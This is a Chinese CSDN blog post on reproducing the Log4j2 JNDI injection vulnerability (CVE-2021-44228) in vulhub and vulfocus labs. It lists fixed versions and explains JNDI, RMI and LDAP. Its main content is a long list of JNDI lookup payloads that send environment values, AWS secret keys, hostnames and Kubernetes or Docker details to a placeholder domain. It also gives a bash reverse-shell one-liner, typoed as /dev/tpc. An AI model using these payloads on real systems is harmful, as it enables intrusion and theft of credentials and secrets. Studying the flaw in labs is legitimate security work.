web打点漏洞

最新推荐文章于 2024-05-18 22:08:03 发布

亿林网络

最新推荐文章于 2024-05-18 22:08:03 发布

阅读量1.1k

点赞数 26

文章标签：前端网络安全 web安全内网 windows

本文链接：https://blog.csdn.net/hakksjss/article/details/138696994

版权

Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228)

Log4j 2.x mitigation Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

简介： Log4j2 是 Java 开发常用的日志框架，该漏洞触发条件低，危害大， poc:${java.version}，他可以通过远程加载恶意类（classloader）的方式执行代码，常见的检测方式是通过dnslog将流量外带；

日志输出原理 string log="变量输入"； logger.info/error("日志：{}",log)

jndi注入（java naming and directory interface中文解释java命名和目录接口）：作用于查找、访问各种资源的通用接口支持服务：Dns、ldap、rmi等

rmi为命名服务，一种键值对绑定，通过键名检索键值 ldap为目录服务，通过对象属性来检索对象，例：通过班级--》姓名这种方式去查找某个人，班级、姓名等为某个人的属性

漏洞复现：

环境搭建 ①vulhub

通过vulhub搭建前提检查自己的端口是否被占用

②vulfocus

https://vulfocus.cn/#/dashboard

由于log4j模块为记录日志，故无法肉眼直接看到漏洞回显，需要使用dnslog这种外带数据平台做辅助利用公开poc，配合dnslog平台验证漏洞是否存在

可尝试执行任意代码，如反弹shell

${jndi:ldap://${env:user}.domain.com/exp} ${jndi:dns://${hostName}.domain.com/a} ${jndi:dns://${env:COMPUTERNAME}.domain.com/a} ${jndi:dns://${env:USERDOMAIN}.domain.com/a} ${jndi:dns://${env:AWS_SECRET_ACCESS_KEY.domain.com/a} ${jndi:ldap://${ctx:loginId}.domain.com/j} ${jndi:ldap://${map:type}.domain.com/j} ${jndi:ldap://${filename}.domain.com/j} ${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j} ${jndi:ldap://${docker:containerId}.domain.com/j} ${jndi:ldap://${docker:containerName}.domain.com/j} ${jndi:ldap://${docker:imageName}.domain.com/j} ${jndi:ldap://${env:USER}.domain.com/j} ${jndi:ldap://${event:Marker}.domain.com/j} ${jndi:ldap://${mdc:UserId}.domain.com/j} ${jndi:ldap://${java:runtime}.domain.com/j} ${jndi:ldap://${java:vm}.domain.com/j} ${jndi:ldap://${java:os}.domain.com/j} ${jndi:ldap://${jndi:logging/context-name}.domain.com/j} ${jndi:ldap://${hostName}.domain.com/j} ${jndi:ldap://${docker:containerId}.domain.com/j} ${jndi:ldap://${k8s:accountName}.domain.com/j} ${jndi:ldap://${k8s:clusterName}.domain.com/j} ${jndi:ldap://${k8s:containerId}.domain.com/j} ${jndi:ldap://${k8s:containerName}.domain.com/j} ${jndi:ldap://${k8s:host}.domain.com/j} ${jndi:ldap://${k8s:labels.app}.domain.com/j} ${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j}

①在自己本机监听端口（一般jndi漏洞需要自己购买云服务器，需要公网ip）

②将反弹shell 的代码套用java通用格式

bash -i >& /dev/tpc/ip/端口 0>&1

亿林网络

关注

26
点赞
踩
6

收藏

觉得还不错? 一键收藏
1
评论
web打点漏洞

简介： Log4j2 是 Java 开发常用的日志框架，该漏洞触发条件低，危害大， poc:${java.version}，他可以通过远程加载恶意类（classloader）的方式执行代码，常见的检测方式是通过dnslog将流量外带；rmi为命名服务，一种键值对绑定，通过键名检索键值 ldap为目录服务，通过对象属性来检索对象，例：通过班级--》姓名这种方式去查找某个人，班级、姓名等为某个人的属性。①在自己本机监听端口（一般jndi漏洞需要自己购买云服务器，需要公网ip）环境搭建 ①vulhub。
复制链接

扫一扫